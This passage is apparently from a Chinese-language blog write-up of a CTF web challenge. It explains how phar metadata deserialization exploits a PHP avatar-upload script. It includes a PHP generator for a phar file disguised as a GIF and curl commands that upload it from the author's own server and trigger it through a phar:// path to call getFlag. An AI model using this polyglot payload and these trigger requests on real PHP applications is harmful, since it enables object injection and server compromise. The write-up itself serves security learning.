off"</span>);</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> file_put_contents($path . <span class="string">"/avatar.gif"</span>, $data); <span class="comment">//把一个$data写入(路径)/avatar.gif文件中</span></span><br><span class="line"> <span class="keyword">die</span>(<span class="string">"Upload OK"</span>);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">show</span><span class="params">($path)</span> </span>{</span><br><span class="line"> <span class="comment">// 查看/avatar.gif</span></span><br><span class="line"> <span class="keyword">if</span> (!file_exists($path . <span class="string">"/avatar.gif"</span>)) { <span class="comment">//查文件或目录是否存在</span></span><br><span class="line"> $path = <span class="string">"/var/www/html"</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> header(<span class="string">"Content-Type: image/gif"</span>); <span class="comment">//gif图片格式 </span></span><br><span class="line"> <span class="keyword">die</span>(file_get_contents($path . <span class="string">"/avatar.gif"</span>)); <span class="comment">//将文件内容读入输出并退出</span></span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">$mode = $_GET[<span class="string">"m"</span>];</span><br><span class="line"><span class="keyword">if</span> ($mode == <span class="string">"upload"</span>) {</span><br><span class="line"> upload(check_session()); <span class="comment">//从cookie中提取data反序列化后的avatar成员并将其内容作为路径, 请求url中的内容写到该路径下的avatar.gif文件中</span></span><br><span class="line">} <span class="keyword">else</span> <span class="keyword">if</span> ($mode == <span class="string">"show"</span>) {</span><br><span class="line"> show(check_session()); <span class="comment">//从cookie中提取data反序列化后的avatar成员并将其内容作为路径, 展示该目录下的avatar.gif</span></span><br><span class="line">} <span class="keyword">else</span> {</span><br><span class="line"> highlight_file(<span class="keyword">__FILE__</span>); <span class="comment">//对取得当前文件的绝对地址文件进行语法高亮显示</span></span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<h4 id="思路解析"><a href="#思路解析" class="headerlink" title="思路解析"></a>思路解析</h4><p>首先分析代码, 首先定义了一个getFlag函数, 执行了这个函数就会出flag, 所以整道题的核心就是执行这个函数</p>
<p>题目主要有两个功能, 一个是在沙盒文件夹任意写入一个gif, 一个是根据cookie中的路径查看这个gif</p>
<h5 id="初步想法"><a href="#初步想法" class="headerlink" title="初步想法"></a>初步想法</h5><p>admin是关键类,利用通过反序列化之后的析构函数去通过lucky参数去调用Getflag函数输出flag,而反序列化的data是从cookie中获得, 那先尝试一下伪造cookie,但是其实cookie后半部分是用hash_hmac和一个未知的秘钥生成的一个签名, 无法绕过判断机制,基本上不可能伪造的了。</p>
<h5 id="本题考点"><a href="#本题考点" class="headerlink" title="本题考点"></a>本题考点</h5><p>php中解析Phar归档中的Metadata的时候会有反序列化的操作</p>
<p><a href="https://www.php.net/manual/zh/phar.getmetadata.php" target="_blank" rel="noopener">https://www.php.net/manual/zh/phar.getmetadata.php</a></p>
<p><a href="https://scriptkid-beta.github.io/2020/06/09/Phar/">Phar://</a></p>
<h4 id="解题步骤"><a href="#解题步骤" class="headerlink" title="解题步骤"></a>解题步骤</h4><h5 id="方式一"><a href="#方式一" class="headerlink" title="方式一"></a>方式一</h5><p>生成phar的gif头格式文件,并修改后缀名为gif</p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"> <span class="class"><span class="keyword">class</span> <span class="title">Admin</span></span>{</span><br><span class="line"> }</span><br><span class="line"> $phar = <span class="keyword">new</span> Phar(<span class="string">"avatar.phar"</span>); <span class="comment">//后缀名必须为phar</span></span><br><span class="line"> $phar->startBuffering();</span><br><span class="line"> $phar->setStub(<span class="string">"GIF89a"</span>.<span class="string">"<?php __HALT_COMPILER(); ?>"</span>); <span class="comment">//设置stubb,增加gif文件头</span></span><br><span class="line"> $o = <span class="keyword">new</span> Admin();</span><br><span class="line"> $phar->setMetadata($o); <span class="comment">//将自定义的meta-data存入manifest里</span></span><br><span class="line"> $phar->addFromString(<span class="string">"test.txt"</span>, <span class="string">"test"</span>); <span class="comment">// 添加要压缩的文件</span></span><br><span class="line"> $phar->stopBuffering(); <span class="comment">// 签名自动计算</span></span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure>
<p>并将生成的gif图放到自己的http服务器中(这里本地python临时起的服务)</p>
<p><img src="/img/%E8%AE%B0%E4%B8%80%E6%AC%A1CTF%E6%8B%89%E7%BB%83/image-20200611132224047.png" alt="image-20200611132224047"></p>
<figure class="highlight sas"><table><tr><td class="code"><pre><span class="line">http://www.xxxx.com/<span class="meta">index</span>.php?m=upload<span class="variable">&url</span>=http://10.255.252.192:8000</span><br><span class="line"></span><br><span class="line">http://www.xxxx.com/<span class="meta">index</span>.php?m=upload<span class="variable">&url</span>=phar:///var/www/data/Y3RmMTAuMjU1LjI1Mi4xOTI=<span class="variable">&lucky</span>=getFlag</span><br><span class="line">注:这里的base64编码(Y3RmMTAuMjU1LjI1Mi4xOTI=)是由(ctf加ip地址)进行base64编码得到的</span><br></pre></td></tr></table></figure>
<p><img src="/img/%E8%AE%B0%E4%B8%80%E6%AC%A1CTF%E6%8B%89%E7%BB%83/image-20200609084749799.png" alt=""></p>
<p><img src="/img/%E8%AE%B0%E4%B8%80%E6%AC%A1CTF%E6%8B%89%E7%BB%83/image-20200609085038212.png" alt="image-20200609085038212"></p>
<h5 id="方式二"><a href="#方式二" class="headerlink" title="方式二"></a>方式二</h5><p>生成phar的gif头格式文件,并修改后缀名为gif</p>
<figure class="highlight xml"><table><tr><td class="code"><pre><span class="line"><span class="php"><span class="meta"><?php</span></span></span><br><span class="line"><span class="php"> <span class="class"><span class="keyword">class</span> <span class="title">Admin</span></span>{</span></span><br><span class="line"><span class="php"> }</span></span><br><span class="line"><span class="php"> $phar = <span class="keyword">new</span> Phar(<span class="string">"avatar.phar"</span>); <span class="comment">//后缀名必须为phar</span></span></span><br><span class="line"><span class="php"> $phar->startBuffering();</span></span><br><span class="line"><span class="php"> $phar->setStub(<span class="string">"GIF89a"</span>.<span class="string">"<?php __HALT_COMPILER(); ?>"</span>); <span class="comment">//设置stubb,增加gif文件头</span></span></span><br><span class="line"><span class="php"> $o = <span class="keyword">new</span> Admin();</span></span><br><span class="line"><span class="php"> $phar->setMetadata($o); <span class="comment">//将自定义的meta-data存入manifest里</span></span></span><br><span class="line"><span class="php"> $phar->addFromString(<span class="string">"test.txt"</span>, <span class="string">"test"</span>); <span class="comment">// 添加要压缩的文件</span></span></span><br><span class="line"><span class="php"> $phar->stopBuffering(); <span class="comment">// 签名自动计算</span></span></span><br><span class="line"><span class="php"><span class="meta">?></span></span></span><br></pre></td></tr></table></figure>
<p>并将生成的gif图放到自己的http服务器中(这里本地python临时起的服务)</p>
<p><img src="/img/%E8%AE%B0%E4%B8%80%E6%AC%A1CTF%E6%8B%89%E7%BB%83/image-20200611132224047.png" alt="image-20200611132224047"></p>
<figure class="highlight mipsasm"><table><tr><td class="code"><pre><span class="line">curl --cookie-<span class="keyword">jar </span>idlefire <span class="string">"http://www.xxxx.com/index.php"</span></span><br><span class="line"></span><br><span class="line">curl -<span class="keyword">b </span>idlefire <span class="string">"http://www.xxxx.com/index.php?m=upload&url=http://10.255.252.192:8000/"</span></span><br><span class="line"></span><br><span class="line">curl -<span class="keyword">b </span>idlefire <span class="string">"http://www.xxxx.com/index.php?m=upload&url=phar:///var/www/data/Y3RmMTAuMjU1LjI1Mi4xOTI=&lucky=getFlag"</span></span><br><span class="line"></span><br><span class="line">注:这里的<span class="keyword">base64编码(Y3RmMTAuMjU1LjI1Mi4xOTI=)是由(ctf加ip地址)进行base64编码得到的</span></span><br></pre></td></tr></table></figure>
<p><img src="/img/%E8%AE%B0%E4%B8%80%E6%AC%A1CTF%E6%8B%89%E7%BB%83/image-20200609085312907.png" alt="image-20200609085312907"></p>
<h4 id="写到最后"><a href="#写到最后" class="headerlink" title="写到最后"></a>写到最后</h4><p>这题根据经典题目(<a href="https://github.com/t3hp0rP/hitconDockerfile/tree/master/hitcon-ctf-2017/baby^h-master-php-2017" target="_blank" rel="noopener">hitcon-ctf-2017baby^h-master-php-2017</a>)进行的改编,在某种程度上进行降低了难度。</p>
<h4 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h4><p><a href="https://www.jianshu.com/p/19e3ee990cb7" target="_blank" rel="noopener">https://www.jianshu.com/p/19e3ee990cb7</a></p>
<p><a href="https://www.bilibili.com/read/cv6347230/" target="_blank" rel="noopener">https://www.bilibili.com/read/cv6347230/</a></p>
<p><a href="https://xz.aliyun.com/t/1773/" target="_blank" rel="noopener">https://xz.aliyun.com/t/1773/</a></p>
<p><a href="https://www.cnblogs.com/jxkshu/p/4997219.html" target="_blank" rel="noopener">https://www.cnblogs.com/jxkshu/p/4997219.html</a></p>
]]></content>
<tags>